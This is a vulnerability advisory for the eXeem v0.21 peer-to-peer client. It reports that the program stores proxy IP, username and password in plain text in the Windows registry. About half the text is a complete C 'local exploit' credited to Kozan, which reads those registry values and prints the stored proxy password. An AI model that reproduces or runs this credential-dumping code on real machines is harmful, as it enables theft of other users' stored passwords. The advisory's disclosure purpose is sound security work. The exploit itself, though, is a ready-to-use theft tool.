eXeem v0.21 discloses passwords for proxy settings to local users.


---------------------
Application:
---------------------

eXeem v0.21


---------------------
Introduction:
---------------------

Vendor: www.exeem.com

Vendor Description:  eXeem™ is a brand new Peer-To-Peer program,
which is based on the BitTorrent idea. eXeem™ eliminates the need
for trackers as nodes in the program will be taking their role. eXeem™
also features easy publication of files to the network as well as a
rating and comments system. eXeem™ contains NO SPYWARE. eXeem™ is
free
and is ad-supported. eXeem™ is currently still in its beta testing phase,
which means that the network might not be completely stable yet.
You are still very welcome to give eXeem™ a try and see how it is
different from other Peer-To-Peer programs.



---------------------
Bug:
---------------------


eXeem v0.21 stores all the information and passwords in registry
in plain text format without crypting and can be viewed by a local user.


---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------


/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.


Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com


*****************************************************************/

#include <stdio.h>
#include <windows.h>


#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
	 proxy_username[BUFSIZE],
	 proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;



int main()
{

	if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                                        0,
                                        KEY_QUERY_VALUE,
                                        &hKey) == ERROR_SUCCESS)
    {

		lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
						       (LPBYTE) proxy_ip, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!\n");
                                 return 0;
                        }

		lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
						       (LPBYTE) proxy_username, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!\n");
                                 return 0;
                        }

		lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
						       (LPBYTE) proxy_password, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!\n");
                                 return 0;
                        }


		RegCloseKey(hKey);

		printf("eXeem v0.21 Local Exploit by Kozan\n");
		printf("Credits to ATmaCA\n");
		printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
		printf("Proxy IP           : %s\n",proxy_ip);
		printf("Proxy Username     : %s\n",proxy_username);
		printf("Proxy Password     : %s\n",proxy_password);


    }
	else
	{
        printf("eXeem v0.21 is not installed on your pc!\n");
    }

	return 0;
}




Kozan...